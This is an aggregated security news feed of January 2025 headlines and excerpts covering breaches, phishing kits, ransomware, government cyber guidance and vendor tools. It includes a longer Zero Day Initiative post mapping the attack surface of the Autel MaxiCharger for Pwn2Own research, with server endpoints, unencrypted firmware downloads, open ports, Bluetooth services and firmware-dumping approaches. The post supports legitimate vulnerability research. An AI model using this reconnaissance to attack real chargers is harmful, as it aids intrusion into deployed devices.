How to Bring Zero Trust to Wi-Fi Security with a Cloud-based Captive Portal?Recent data breaches have highlighted the critical need to improve guest Wi-Fi infrastructure security in modern business environments. Organizations face increasing pressure to protect their networks while providing convenient access to visitors, contractors, temporary staff, and employees with BYOD. Implementing secure guest Wi-Fi infrastructure has become essential for authenticating access,
by The Hacker News
2025-01-17 15:37:00
New 'Sneaky 2FA'' Phishing Kit Targets Microsoft 365 Accounts with 2FA Code BypassCybersecurity researchers have detailed a new adversary-in-the-middle (AitM) phishing kit that''s capable of Microsoft 365 accounts with an aim to steal credentials and two-factor authentication (2FA) codes since at least October 2024. The nascent phishing kit has been dubbed Sneaky 2FA by French cybersecurity company Sekoia, which detected it in the wild in December. Nearly 100 domains hosting
by The Hacker News
2025-01-17 15:37:00
U.S. Sanctions North Korean IT Worker Network Supporting WMD ProgramsThe U.S. Treasury Department''s Office of Foreign Assets Control (OFAC) sanctioned two individuals and four entities for their alleged involvement in illicit revenue generation schemes for the Democratic People''s Republic of Korea (DPRK) by dispatching IT workers around the world to obtain employment and draw a steady source of income for the regime in violation of international sanctions. ""These
by The Hacker News
2025-01-17 15:11:12
Advanced Persistent Threat (APT): Examples and PreventionAdvanced persistent threats (APTs) use sophisticated tools and techniques to breach systems and maintain access—all while remaining undetected. Unlike other cyberattacks, APTs work over an extended period, using more resources to achieve specific objectives, such as stealing sensitive data or bringing down operations.
by Legit Security
2025-01-17 15:00:00
Leveraging Behavioral Insights to Counter LLM-Enabled HackingAs LLMs broaden access to hacking and diversify attack strategies, understanding the thought processes behind these innovations will be vital for bolstering IT defenses.
by Dark Reading
2025-01-17 14:46:39
Tarbomb Denial of Service via Path TraversalPraetorian recently uncovered a denial-of-service vulnerability by chaining together path traversal and legacy file upload features in a CI/CD web application; highlighting the risks of undocumented features and the importance of input validation in web security. The post Tarbomb Denial of Service via Path Traversal appeared first on Praetorian.
by Praetorian
2025-01-17 14:00:00
Your KnowBe4 Compliance Plus Fresh Content Updates from December 2024Check out the December updates in Compliance Plus so you can stay on top of featured compliance training content.
by KnowBe4
2025-01-17 14:00:00
How to calculate your AI-powered cybersecurity’s ROIImagine this scenario: A sophisticated, malicious phishing campaign targets a large financial institution. The attackers use emails generated by artificial intelligence (AI) that closely mimic the company’s internal communications. The emails contain malicious links designed to steal employee credentials, which the attackers could use to gain access to company assets and data for unknown purposes. […] The post How to calculate your AI-powered cybersecurity’s ROI appeared first on Security Intelligence.
by Security Intelligence
2025-01-17 13:32:19
Ransomware Gangs Claimed More Than 5,000 Attacks in 2024Ransomware groups claimed responsibility for 5,461 attacks in 2024, with 1,204 of these attacks being publicly confirmed by victim organizations, according to Comparitech’s latest Ransomware Roundup report.
by KnowBe4
2025-01-17 13:22:06
Hype and confusion surrounding quantum computers in cryptographyWho claimed quantum supremacy and decryption on quantum computers?
by Kaspersky
2025-01-17 12:00:00
PowerShell Arrays: How To Build, Manipulate, and Manage ThemPowerShell arrays support dynamic operations like adding, modifying, or removing elements, and can also be filtered and manipulated using advanced techniques like slicing, joining, and looping through array items.
by ITPro Today
2025-01-17 11:34:32
Blue Yonder investigating Clop ransomware threat linked to exploited Cleo CVEsThe financially-motivated hacker was previously linked to the mass exploitation of critical vulnerabilities in MOVEit file-transfer software.
by Cybersecurity Dive
2025-01-17 11:00:00
Cloud & Edge Computing Trends and Predictions 2025 From Industry InsidersIT leaders and industry insiders share their cloud computing and edge computing trends and predictions for 2025.
by ITPro Today
2025-01-17 10:00:33
Mercedes-Benz Head Unit security research reportKaspersky experts analyzed the Mercedes-Benz head unit, its IPC protocols and firmware, and found new vulnerabilities via physical access.
by Securelist
2025-01-17 09:46:03
Why Enterprises Are Prioritizing Employee Experience — AgainWith the tech talent shortage, organizations are having a tough time hiring and retaining the right talent. Employee experience matters greatly.
by ITPro Today
2025-01-17 09:44:00
European Privacy Group Sues TikTok and AliExpress for Illicit Data Transfers to ChinaAustrian privacy non-profit None of Your Business (noyb) has filed complaints accusing companies like TikTok, AliExpress, SHEIN, Temu, WeChat, and Xiaomi of violating data protection regulations in the European Union by unlawfully transferring users'' data to China. The advocacy group is seeking an immediate suspension of such transfers, stating the companies in question cannot shield user data
by The Hacker News
2025-01-17 09:20:13
Recognizing Signs of Trouble in Your Kubernetes EnvironmentTraditional observability tools fall short in capturing Kubernetes'' complexity; modern solutions must go beyond metrics and logs to deliver proactive, holistic management of cloud-native environments.
by ITPro Today
2025-01-17 09:18:00
FCC enacts rule requiring telecom operators to secure networksThe agency’s declaratory ruling took effect Thursday, but the future outlook of that effort and a separate proposed rule remain uncertain under the incoming administration.
by Cybersecurity Dive
2025-01-17 09:00:00
Cybersecurity Snapshot: CISA Lists Security Features OT Products Should Have and Publishes AI Collaboration PlaybookShopping for OT systems? A new CISA guide outlines OT cyber features to look for. Meanwhile, the U.S. government publishes a playbook for collecting AI vulnerability data. Plus, a White House EO highlights AI security goals. And get the latest on IoT security; secure app dev; and tougher HIPAA cyber rules.Dive into six things that are top of mind for the week ending Jan. 17.1 - How to choose cybersecure OT productsIs your organization evaluating operational technology (OT) products for purchase? If so, a new guide from the U.S. Cybersecurity and Infrastructure Security Agency (CISA) aims to help OT operators choose OT products designed with strong cybersecurity features.The publication, titled “Secure by Demand: Priority Considerations for Operational Technology Owners and Operators when Selecting Digital Products,” highlights 12 cybersecurity elements that OT products should have, including:Support for controlling and tracking modifications to configuration settingsLogging of all actions using open-standard logging formatsRigorous testing for vulnerabilities and timely provision of free and easy-to-install patches and updatesStrong authentication methods such as role-based access control and phishing-resistant multi-factor authentication to prevent unauthorized accessProtection of the integrity and confidentiality of data at rest and in transitAccording to CISA, many OT products aren’t designed and developed securely, so they ship with security issues such as weak authentication, known vulnerabilities and insecure default settings. In fact, the agency says it’s common for hackers to target handpicked OT products instead of going after specific organizations. Thus, it’s critical for organizations, especially those in critical infrastructure sectors, to pick OT products built securely by using CISA’s “Secure by Design” principles.“When security is not prioritized nor incorporated directly into OT products, it is difficult and costly for owners and operators to defend their OT assets against compromise,” reads the guide, published in collaboration with other U.S. and international agencies.For more information about OT systems cybersecurity, check out these Tenable resources: “What is operational technology (OT)?” (guide)“Discover, Measure, and Minimize the Risk Posed by Your Interconnected IT/OT/IoT Environments” (on-demand webinar)“How To Secure All of Your Assets - IT, OT and IoT - With an Exposure Management Platform” (blog)“Blackbox to blueprint: The security leader’s guidebook to managing OT and IT risk” (white paper)“OT Security Master Class: Understanding the Key Principles, Challenges, and Solutions” (on-demand webinar)2 - JCDC publishes playbook to collect AI security info A new playbook published by the U.S. government aims to facilitate the collective, voluntary sharing of information among AI providers, developers and users about AI vulnerabilities and cyber incidents.The “AI Cybersecurity Collaboration Playbook” from CISA’s Joint Cyber Defense Collaborative (JCDC) details ways in which AI community members in government and in the private sector – both in the U.S. and abroad – can collaborate to help boost AI security for everybody.“The development of this playbook is a major milestone in our efforts to secure AI systems through active collaboration,” CISA Director Jen Easterly said in a statement.AI systems introduce unique cybersecurity challenges which make them vulnerable to attacks including model poisoning, data manipulation and malicious inputs. “These vulnerabilities, coupled with the rapid adoption of AI systems, demand comprehensive strategies and public-private partnership to address evolving risks,” the 33-page playbook reads.By collecting, analyzing and enriching information on AI vulnerabilities and cyber incidents, CISA would be able to help the AI community in a variety of ways, including by:Sharing information to improve detection and prevention of AI threatsExposing attackers’ tactics and infrastructureIdentifying and notifying victimsGenerating threat advisories and intelligence reportsOffering tailored recommendations, vulnerability management strategies and cyber defense best practicesThe playbook’s target audience is operational cybersecurity professionals, including incident responders and security analysts, and its goal is to help them collaborate and share information with CISA and JCDC about AI security.In addition, CISA also envisions organizations adopting the document’s guidance internally “to enhance their own information-sharing practices, contributing to a unified approach to AI-related threats across critical infrastructure.”For more information about industry efforts for collaborating on AI security:Cloud Security Alliance’s “AI Safety Initiative”MITRE’s “AI Incident Sharing initiative”Open Worldwide Application Security Project’s “AI Exchange”U.S. government’s “Testing Risks of AI for National Security (TRAINS) Taskforce”3 - New White House cybersecurity EO includes AI requirementsThe Biden Administration issued a sweeping cybersecurity executive order (EO) this week aimed at boosting U.S. cyberdefenses, and AI security is one area that it says must be strengthened.The “Executive Order on Strengthening and Promoting Innovation in the Nation’s Cybersecurity” calls for promoting security “with and in” AI, saying it can speed up the identification of new vulnerabilities, scale up threat detection and automate cyberdefenses.“The Federal Government must accelerate the development and deployment of AI, explore ways to improve the cybersecurity of critical infrastructure using AI, and accelerate research at the intersection of AI and cybersecurity,” the executive order reads.Among the executive order’s requirements for AI are:Launching a pilot program on using AI to improve cyberdefense of critical infrastructure in the energy sector. The Secretaries of Energy, Defense and Homeland Security would be in charge of the program, in collaboration with private-sector critical infrastructure organizations. The program may include:vulnerability detectionautomatic patch managementidentification and categorization of anomalous and malicious activity across IT or OT systemsThe Secretary of Defense must establish a program to use advanced AI models for cyberdefense.The Secretaries of Commerce, Energy and Homeland Security, and the National Science Foundation Director, must prioritize funding for their respective programs that encourage the development of “large-scale, labeled datasets needed to make progress on cyber defense research.”The Secretaries of Defense and Homeland Security, and the Director of National Intelligence must incorporate management of AI software vulnerabilities and compromises into their agencies’ process and “and interagency coordination mechanisms for vulnerability management.” These efforts should include incident tracking, response, reporting and sharing AI systems’ indicators of compromise.These AI-related actions all must be completed at various dates during 2025.The executive order covers multiple other areas. To get all the details and expert analysis, read our blog “New Cybersecurity Executive Order: What It Means for Federal Agencies” from Robert Huber, Tenable’s Chief Security Officer, Head of Research and President of Tenable Public Sector.4 - CISA publishes secure software development best practicesSoftware makers interested in improving the security of their development process and of their products have fresh guidance to peruse.As part of its “Secure by Design” program, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) has published cybersecurity recommendations for protecting organizations’ software development lifecycle.The best practices are organized into two categories — Software development process goals; and Product design goals — and include:Software development process goals:Address vulnerabilities before releasing the software product, and publish a vulnerability disclosure policy.Separate all software development environments, including development, build and test, to reduce the lateral movement risk.Enforce multi-factor authentication across all software development environments.Securely store and transmit credentials.Product design goalsReduce entire classes of preventable vulnerabilities, such as SQL injection vulnerabilities, memory safety vulnerabilities and cross-site scripting vulnerabilities.Provide timely security patches to customers.Don’t use default password in your products.Let users know when your products are nearing end-of-life status and you will no longer provide security patches for them.The recommendations “will help to protect the sector from cyber incidents, identify and address vulnerabilities prior to product release, improve incident response, and significantly improve software security,” reads a CISA statement.To get more details, read the full “Information Technology (IT) Sector-Specific Goals (SSGs)” fact sheet.For more information about secure software development:“CISA Tells Tech Vendors To Squash Command Injection Bugs, as OpenSSF Calls on Developers To Boost Security Skills” (Tenable)“Secure Development” (Software Engineering Institute, Carnegie Mellon Univ.)“Secure Software Development Framework” (NIST)“Secure development and deployment guidance” (UK NCSC)“OWASP Developer Guide” (Open Worldwide Application Security Project )5 - U.S. gov’t launches security label for IoT productsTo encourage the development of safer internet of things (IoT) devices for consumers, the U.S. government has introduced a new label for IoT products that meet National Institute of Standards and Technology (NIST) cybersecurity standards.Called the U.S. Cyber Trust Mark, the label will also help U.S. consumers know which IoT products are more secure, as they shop for internet-connected ware, such as baby monitors, security cameras, refrigerators, garage door openers and thermostats.“These devices are part of Americans’ daily lives. But Americans are worried about the rise of criminals remotely hacking into home security systems to unlock doors, or malicious attackers tapping into insecure home cameras to illicitly record conversations,” reads a White House statement.IoT manufacturers will soon be able to seek the U.S. Cyber Trust Mark label by submitting their IoT products to accredited labs for testing. Tests will cover areas including password authentication, data protection, software updates and incident detection. IoT products that earn the label will also have a QR code that’ll link consumers to information such as:How to change default passwordsHow to configure the device securelyHow to access software updates and patches if they’re not delivered automaticallyThe end date of the product’s support periodParticipation in the U.S. Cyber Trust Mark program is voluntary for IoT manufacturers. IoT devices excluded from the program include motor vehicles, medical devices, and products used for manufacturing, industrial control and enterprise applications.To get more details, visit the U.S. Cyber Trust Mark home page.For more information about securing consumer IoT devices, check out resources from the IoT Security Foundation; the European Telecommunications Standards Institute; TechAccord; Internet Society; the U.K. National Cyber Security Centre; and the International Organization for Standardization (ISO). 6 - U.S. gov’t seeks tougher cybersecurity rules for health providersDoctors, hospitals, health insurers and other healthcare organizations may face stricter cybersecurity regulations in the U.S.That’s because the U.S. government is seeking to tighten the cybersecurity requirements in the Health Insurance Portability and Accountability Act (HIPAA).The new cybersecurity rules proposed by the Department of Health and Human Services (HHS) include:Develop and revise on an ongoing basis a technology asset inventory and a network map that illustrates the movement of electronic protected health information (ePHI) throughout the organization’s electronic information systems.Make risk analysis more specific by submitting written assessments that include:A review of the technology asset inventory and network mapReasonably anticipated threats to ePHI’s confidentiality, availability and integrityPotential vulnerabilities to the organization’s electronic information systemsA risk-level assessment of identified threats and vulnerabilitiesStrengthen contingency planning and security incident response with steps including:Draft written plans to restore certain electronic information systems and data within 72 hours.Prioritize restoration by analyzing criticality of systems and tech assets.Outline in writing how employees and the organization will respond to known or suspected security incidents.Conduct an audit at least once per year to ensure the organization’s compliance with HIPAA’s cybersecurity rules.With limited exceptions, encrypt ePHI at rest and in transit and require the use of multi-factor authentication.Conduct vulnerability scanning at least every six months, and penetration testing at least once a year.For more details about HHS’ new proposed HIPAA cybersecurity rules and to submit public comments about them, go to the Federal Register’s “HIPAA Security Rule To Strengthen the Cybersecurity of Electronic Protected Health Information” page. The comment period ends on March 7, 2025.
by Tenable
2025-01-17 06:58:35
BlackSuit Ransomware Group: What Have Changed After Royal RansomwareThe BlackSuit ransomware group, a successor to the infamous Royal ransomware, has rapidly established itself as a prominent cyber threat since its emergence in mid-2023. Leveraging advanced tactics, techniques, and procedures (TTPs), BlackSuit employs a multifaceted approach that includes phishing, RDP exploitation, and double extortion to target high-value organizations worldwide. With over $500 million in ransom demands and attacks on industries ranging from education to automotive, BlackSuit showcases evolving ransomware capabilities.
by Picus Security
2025-01-17 04:00:00
Russian APT Phishes Kazakh Gov't for Strategic IntelA highly targeted cyber-intelligence campaign adds fuel to the increasingly complex relationship between the two former Soviet states.
by Dark Reading
2025-01-17 02:18:00
The complete list of Q4 2024 releases and updates on HTB Enterprise PlatformBuilding on the feedback from our 3.2M+ cybersecurity professionals and addressing industry challenges, we’re thrilled to share the latest Hack The Box updates from the past three months!
by Hack The Box Blog
2025-01-17 00:30:13
Threat Brief: CVE-2025-0282 and CVE-2025-0283 (Updated Jan. 17)CVE-2025-0282 and CVE-2025-0283 affect multiple Ivanti products. This threat brief covers attack scope, including details from an incident response case. The post Threat Brief: CVE-2025-0282 and CVE-2025-0283 (Updated Jan. 17) appeared first on Unit 42.
by Palo Alto Networks - Unit42
2025-01-17 00:14:45
Hackers Likely Stole FBI Call Logs From AT&T That Could Compromise InformantsA breach of AT&T that exposed “nearly all” of the company’s customers may have included records related to confidential FBI sources, potentially explaining the bureau’s new embrace of end-to-end encryption.
by WIRED Security News
2025-01-16 23:52:14
Biden's Cybersecurity EO Leaves Trump a Comprehensive Blueprint for DefenseNew order mandates securing the federal software supply chain and communications networks, as well as deploying AI tools to protect critical infrastructure from cyberattacks — but will the Trump administration follow through?
by Dark Reading
2025-01-16 23:42:00
Russian Star Blizzard Targets WhatsApp Accounts in New Spear-Phishing CampaignThe Russian threat actor known as Star Blizzard has been linked to a new spear-phishing campaign that targets victims'' WhatsApp accounts, signaling a departure from its longstanding tradecraft in a likely attempt to evade detection. ""Star Blizzard''s targets are most commonly related to government or diplomacy (both incumbent and former position holders), defense policy or international relations
by The Hacker News
2025-01-16 22:03:05
183M Patient Records Exposed: Fortified Health Security Releases 2025 Healthcare Cybersecurity Report
by Dark Reading
2025-01-16 21:36:00
CISA and US and International Partners Publish Guidance for OT Owners and Operators
by Dark Reading
2025-01-16 21:35:17
Reimagining Your SOC: How to Achieve Proactive Network SecurityThis blog post advises on how security teams can move to autonomous detection and investigation of novel threats, reducing alert fatigue, and enabling tailored, real-time threat response.
by Darktrace
2025-01-16 21:32:14
SEALSQ in Cooperation With WISeKey Expands Post-Quantum Footprint in Saudi Arabia
by Dark Reading
2025-01-16 21:18:48
Chinese Innovations Spawn Wave of Toll Phishing Via SMSResidents across the United States are being inundated with text messages purporting to come from toll road operators like E-ZPass, warning that recipients face fines if a delinquent toll fee remains unpaid. Researchers say the surge in SMS spam coincides with new features added to a popular commercial phishing kit sold in China that makes it simple to set up convincing lures spoofing toll road operators in multiple U.S. states.
by Krebs on Security
2025-01-16 21:14:20
FTC Orders GoDaddy to Fix Inadequate Security PracticesThe FTC claims that the Web hosting company''s security failures led to several major breaches in the past few years.
by Dark Reading
2025-01-16 19:15:38
Find the helpersBill discusses how to find ''the helpers'' and the importance of knowledge sharing. Plus, there''s a lot to talk about in our latest vulnerability roundup.
by Cisco Talos Blog
2025-01-16 19:00:00
How to protect your site from subdomain takeoverSubdomain takeover is a serious risk for organizations with a large online presence (which is a lot of businesses in 2025!). A domain name is the starting point of your company’s online identity, encompassing the main and subsidiary websites—serving as the organization’s business card, storefront, and a central hub for commercial activities. For SaaS providers […] The post How to protect your site from subdomain takeover appeared first on Outpost24.
by Outpost24
2025-01-16 18:09:54
Extending Falco for BoxBox, Inc. specialises in developing and marketing cloud-based content management, collaboration, and file-sharing tools for businesses. While Box’s services are... The post Extending Falco for Box appeared first on Sysdig.
by Sysdig
2025-01-16 17:56:45
Updated Response to CISA Advisory (AA23-136A): #StopRansomware: BianLian Ransomware GroupAttackIQ has released an updated attack graph in response to the recently revised CISA Advisory (AA23-136A) that disseminates known BianLian ransomware group Indicators of Compromise (IOCs) and Tactics, Techniques, and Procedures (TTPs) identified through the Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA) and the Australian Cyber Security Centre (ACSC) investigations. The post Updated Response to CISA Advisory (AA23-136A): #StopRansomware: BianLian Ransomware Group appeared first on AttackIQ.
by AttackIQ
2025-01-16 17:55:00
Ready to Simplify Trust Management? Join Free Webinar to See DigiCert ONE in ActionThe digital world is exploding. IoT devices are multiplying like rabbits, certificates are piling up faster than you can count, and compliance requirements are tightening by the day. Keeping up with it all can feel like trying to juggle chainsaws while riding a unicycle. Traditional trust management? Forget it. It''s simply not built for today''s fast-paced, hybrid environments. You need a
by The Hacker News
2025-01-16 17:48:07
White House Executive Order: Strengthening and Promoting Innovation in the Nation’s CybersecurityGet details on this new cybersecurity Executive Order and its implications.
by Legit Security
2025-01-16 17:42:13
Agentic AI Paves the Way for Sophisticated CyberattacksGartner analysts discuss how agentic AI will transform business operations by 2028, while also raising the risk of cyberattacks.
by ITPro Today
2025-01-16 17:00:02
Gootloader inside outOpen-source intelligence reveals the server-side code of this pernicious SEO-driven malware - without needing a lawyer afterward
by Sophos News
2025-01-16 17:00:00
The $10 Cyber Threat Responsible for the Biggest Breaches of 2024You can tell the story of the current state of stolen credential-based attacks in three numbers: Stolen credentials were the #1 attacker action in 2023/24, and the breach vector for 80% of web app attacks. (Source: Verizon). Cybersecurity budgets grew again in 2024, with organizations now spending almost $1,100 per user (Source: Forrester). Stolen credentials on criminal forums cost as
by The Hacker News
2025-01-16 16:53:00
New UEFI Secure Boot Vulnerability Could Allow Attackers to Load Malicious BootkitsDetails have emerged about a now-patched security vulnerability that could allow a bypass of the Secure Boot mechanism in Unified Extensible Firmware Interface (UEFI) systems. The vulnerability, assigned the CVE identifier CVE-2024-7344 (CVSS score: 6.7), resides in a UEFI application signed by Microsoft''s ""Microsoft Corporation UEFI CA 2011"" third-party UEFI certificate, according to a new
by The Hacker News
2025-01-16 16:50:00
Researchers Find Exploit Allowing NTLMv1 Despite Active Directory RestrictionsCybersecurity researchers have found that the Microsoft Active Directory Group Policy that''s designed to disable NT LAN Manager (NTLM) v1 can be trivially bypassed by a misconfiguration. ""A simple misconfiguration in on-premise applications can override the Group Policy, effectively negating the Group Policy designed to stop NTLMv1 authentications,"" Silverfort researcher Dor Segal said in a
by The Hacker News
2025-01-16 16:45:00
Hackers Hide Malware in Images to Deploy VIP Keylogger and 0bj3ctivity StealerThreat actors have been observed concealing malicious code in images to deliver malware such as VIP Keylogger and 0bj3ctivity Stealer as part of separate campaigns. ""In both campaigns, attackers hid malicious code in images they uploaded to archive[.]org, a file-hosting website, and used the same .NET loader to install their final payloads,"" HP Wolf Security said in its Threat Insights Report
by The Hacker News
2025-01-16 16:38:42
What Lies Ahead for the Global BPO Sector in 2025?Businesses are turning to innovative BPO strategies powered by AI, automation, and data-driven insights to streamline operations, reduce costs, and deliver personalized customer experiences in 2025.
by ITPro Today
2025-01-16 16:17:45
Essential PowerShell Commands: A Cheat Sheet for BeginnersThis post first appeared on blog.netwrix.com and was written by Jonathan Blackwell.Introduction to PowerShell What Is PowerShell? PowerShell is a powerful command-line shell that supports scripting languages and provides tools for managing computer resources locally and remotely. Benefits of PowerShell for Windows Administration Windows PowerShell commands enable automation of repetitive tasks such as managing users, services, files, or scripts. PowerShell can also be used for managing … Continued
by Netwrix
2025-01-16 16:11:41
Introduction to PowerShell Invoke-CommandThis post first appeared on blog.netwrix.com and was written by Jonathan Blackwell.The Invoke-Command cmdlet in PowerShell enables IT admins to execute commands and scripts on remote machines, and even to redirect the output of those remote scripts to their own console. As a result, they can manage multiple machines from a central location. Key use cases include: Invoke-Command offers all of the following valuable capabilities: Benefits … Continued
by Netwrix
2025-01-16 16:03:00
Russia’s Star Blizzard pivots to WhatsApp in spear-phishing campaign
by ComputerWeekly
2025-01-16 16:00:00
Reviewing the Attack Surface of the Autel MaxiCharger: Part TwoPreviously, we covered the internals of the Autel MaxiCharger where we highlighted each of the main components. In this post, we aim to outline the attack surface of the MaxiCharger in the hopes of providing inspiration for vulnerability research.All information has been obtained through reverse engineering, experimenting, and combing through the Autel MaxiCharger manual (PDF).At the time of writing the following software versions were applicable:· Autel Charge app v3.0.7· Autel Config app v2.1.0· Autel MaxiCharger modules: · Charge Control v1.36.00 · Power Control v1.21.00 · LCD Control v0.99.31 · LCD Information v0.99.08 · LCD Resources v0.99.08 · LCD Languages v0.04.04Mobile ApplicationsAutel has published two mobile applications for both Android and iOS. The main app is called Autel Charge and contains functionality intended for end users. Some of the features include:· Defining charging schedules· Load balancing· Providing Wi-Fi credentials for the charger to use· Forcing firmware updates· OCPP server selection (including custom servers)· Current limiting· Finding other chargers on a map· Checking charger version informationUpon loading the app on a rooted Android device a superuser request can be seen. This was unexpected and points towards the app employing anti-reversing measures. Denying the request loads the app normally. Figure 1: Autel Charge superuser request After denying the superuser request a new Autel account can be created using an email address.The second app is named Autel Config and allows installers / technicians to configure chargers and manage tickets. Unlike the Autel Charge app, there is no option to register for an account and providing Autel Charge account credentials doesn''t work. This suggests that installers / technicians have some other way of obtaining valid credentials.Further research into these apps could be valuable to better understand how the apps and charger communicate. Network Traffic AnalysisUsing the Autel Charge app the MaxiCharger was configured to connect to a researcher controlled Wi-Fi network in order to monitor the network traffic. The app and charger were then left idling whilst the traffic was captured. A few DNS requests were sent out from the charger (192.168.200.66) for Autel related infrastructure. Figure 2: Charger DNS queries The first query was for gateway-eneprodus.autel.com which is an alias of eneprodus-alb-internet-2014464356.us-west-2.elb.amazonaws.com. This resolved to the following IP addresses (shown in the order received): • 54.185.127.160 • 52.36.153.97 • 44.240.206.177 • 34.215.58.124 Straight after the first DNS query response a TLS session was set up and encrypted data was sent by the charger on port 443 to 54.185.127.160. Data was sent back and forth between the charger and server a few times before another DNS query was sent. The charger issued another query for gateway-eneprodus.autel.com which, as before, is an alias and returned the same IP addresses but in a different order presumably due to load balancing. This time the DNS query returned the IP addresses: • 34.215.58.124 • 44.240.206.177 • 54.185.127.160 • 52.36.153.97 Like previously, the charger used the first IP address that was returned but this time no TLS session was set up. Plain HTTP was used. Figure 3: HTTP traffic Looking a bit closer showed the charger periodically sending log data to the Autel server. The server always responded with JSON that had a null data value, a 200 code value and a message value of OK. Figure 4: HTTP POST traffic After a while the charger made another DNS request for gateway-eneprodus.autel.com, this time the 44.240.206.177 IP address was returned first. The charger then sent a HTTP POST to /api/app-version-manager/version/upgrade/ota with device related details such as the serial number and current firmware version. The server responded with JSON containing firmware update related information including a URL to download the latest version. Figure 5: HTTP firmware related traffic The charger then proceeded to send a DNS request for s3.us-west-2.amazonaws.com and directly downloaded the firmware update over HTTP. The same pattern was observed multiple times as the device downloaded firmware updates for each of its modules. A list of these modules and their versions can be viewed in the Autel Charge app by navigating to the Charger Info page. Figure 6: MaxiCharger module versions After the firmware was updated and the charger rebooted no further HTTP traffic was observed to the logging or firmware update endpoint, instead only HTTPS was used.Port scanning the charger over Wi-Fi showed no open TCP or UDP ports however UDP ports 6000 and 6666 appear to be listening over the Ethernet interface. The Ethernet interface is a valid target for the competition so these 2 listening services may be worth researching further.Bluetooth Low EnergyBy default the MaxiCharger uses the device serial number as the device name when advertising over Bluetooth. Once connected there are 4 available services that offer a total of 14 characteristics. Autel Charge uses these endpoints to communicate with the charger. A dump of each service and associated characteristics is shown below. Further research into Autel Charge and Autel Config will likely assist in understanding the bluetooth services better.FirmwareAs mentioned in the previous blog the main microcontroller has readout protection enabled however this can be bypassed using techniques covered in Jonathan Andersson''s and Thanos Kaliyanakis'' Blackhat EU talk. Keep an eye out for future blog posts that will cover these techniques. One of which doesn''t require glitching!The main firmware can also be acquired by sniffing the charger update process (as described in the Network Traffic Analysis section) or by reversing the app to figure out the download URLs. The firmware of ESP32 WROOM 32D module can be dumped using the standard esptool.py from Espressif. During research it was noted that the esptool.py would sometimes fail to dump the full firmware image. To mitigate this the firmware can be dumped in smaller chunks and then stitched back together into a single blob. Other Potential Attack SurfacesThere are a few other attack surfaces that are considered in scope and are worth mentioning. One of these is the undocumented USB C port that can be found behind a small panel on the side of the unit. There is no publicly available information about what this USB port is used for.Also, next to the USB port is the SIM card tray. Attacks that utilize a SIM card are also considered to be in scope.And finally, there is the RFID (NFC) reader.SummaryHopefully this blog post provides enough information to kickstart vulnerability research against the Autel MaxiCharger. We are looking forward to Pwn2Own Automotive again in Tokyo in January 2025 at Automotive World, and we will see if IVI vendors have improved their product security. Don’t wait until the last minute to ask questions and register! We hope to see you there.You can find me on Twitter at @ByteInsight, and follow the team on Twitter, Mastodon, LinkedIn, or Bluesky for the latest in exploit techniques and security patches.
by Zero Day Initiative Blog
2025-01-16 15:47:22
The best password manager for families in 2025: Expert tested and reviewedThe best password managers provide security, privacy, and ease of use for a reasonable price. We tested the best ones to help you find what''s best for your family.
by ZDNET Security
2025-01-16 15:10:52
Avery had credit card skimmer stuck on its site for monthsAvery has confirmed its website was compromised by a credit card skimmer that potentially affected over 60,000 customers.
by Malwarebytes Labs
2025-01-16 15:00:00
One Active Directory Account Can Be Your Best Early WarningHere we go again, discussing Active Directory, hacking, and detection engineering. tl;dr: One AD account can provide you with three detections that if implemented properly will catch common adversarial activities […] The post One Active Directory Account Can Be Your Best Early Warning appeared first on Black Hills Information Security.
by Black Hills Information Security
2025-01-16 15:00:00
Strategic Approaches to Threat Detection, Investigation & ResponseBy staying vigilant, agile, and prepared, organizations can turn TDIR from a defensive strategy into a proactive enabler of security and operational excellence.
by Dark Reading
2025-01-16 14:29:59
Risk, Reputational Scores Enjoy Mixed Success as Security ToolsPart predictive analysis, part intuition, risk and reputation services are imperfect instruments at best — and better than nothing for most organizations and insurers.
by Dark Reading
2025-01-16 14:10:00
The SOC case files: XDR’s automated threat response delivers high speed protection to an employee in the cloudAn employee at a telecommunications company connected as usual to their cloud account. They then appeared to travel a distance of 361 km, roughly 225 miles, at nearly twice the speed of sound before logging in again.
by Barracuda
2025-01-16 14:06:00
OSV-SCALIBR: A library for Software Composition AnalysisPosted by Erik Varga, Vulnerability Management, and Rex Pan, Open Source Security TeamIn December 2022, we announced OSV-Scanner, a tool to enable developers to easily scan for vulnerabilities in their open source dependencies. Together with the open source community, we’ve continued to build this tool, adding remediation features, as well as expanding ecosystem support to 11 programming languages and 20 package manager formats. Today, we’re excited to release OSV-SCALIBR (Software Composition Analysis LIBRary), an extensible library for SCA and file system scanning. OSV-SCALIBR combines Google’s internal vulnerability management expertise into one scanning library with significant new capabilities such as:SCA for installed packages, standalone binaries, as well as source codeOSes package scanning on Linux (COS, Debian, Ubuntu, RHEL, and much more), Windows, and MacArtifact and lockfile scanning in major language ecosystems (Go, Java, Javascript, Python, Ruby, and much more)Vulnerability scanning tools such as weak credential detectors for Linux, Windows, and MacSBOM generation in SPDX and CycloneDX, the two most popular document formatsOptimization for on-host scanning of resource constrained environments where performance and low resource consumption is criticalOSV-SCALIBR is now the primary SCA engine used within Google for live hosts, code repos, and containers. It’s been used and tested extensively across many different products and internal tools to help generate SBOMs, find vulnerabilities, and help protect our users’ data at Google scale.We offer OSV-SCALIBR primarily as an open source Go library today, and we''re working on adding its new capabilities into OSV-Scanner as the primary CLI interface.Using OSV-SCALIBR as a libraryAll of OSV-SCALIBR''s capabilities are modularized into plugins for software extraction and vulnerability detection which are very simple to expand.You can use OSV-SCALIBR as a library to:1.Generate SBOMs from the build artifacts and code repos on your live host:import ( ""context"" ""github.com/google/osv-scalibr"" ""github.com/google/osv-scalibr/converter"" ""github.com/google/osv-scalibr/extractor/filesystem/list"" ""github.com/google/osv-scalibr/fs"" ""github.com/google/osv-scalibr/plugin"" spdx ""github.com/spdx/tools-golang/spdx/v2/v2_3"")func GenSBOM(ctx context.Context) *spdx.Document { capab := &plugin.Capabilities{OS: plugin.OSLinux} cfg := &scalibr.ScanConfig{ ScanRoots: fs.RealFSScanRoots(""/""), FilesystemExtractors: list.FromCapabilities(capab), Capabilities: capab, } result := scalibr.New().Scan(ctx, cfg) return converter.ToSPDX23(result, converter.SPDXConfig{})}2. Scan a git repo for SBOMs:Simply replace ""/"" with the path to your git repo. Also take a look at the various language extractors to enable for code scanning.3. Scan a remote container for SBOMs:Replace the scan config from the above code snippet withimport ( ... ""github.com/google/go-containerregistry/pkg/authn"" ""github.com/google/go-containerregistry/pkg/v1/remote"" ""github.com/google/osv-scalibr/artifact/image"" 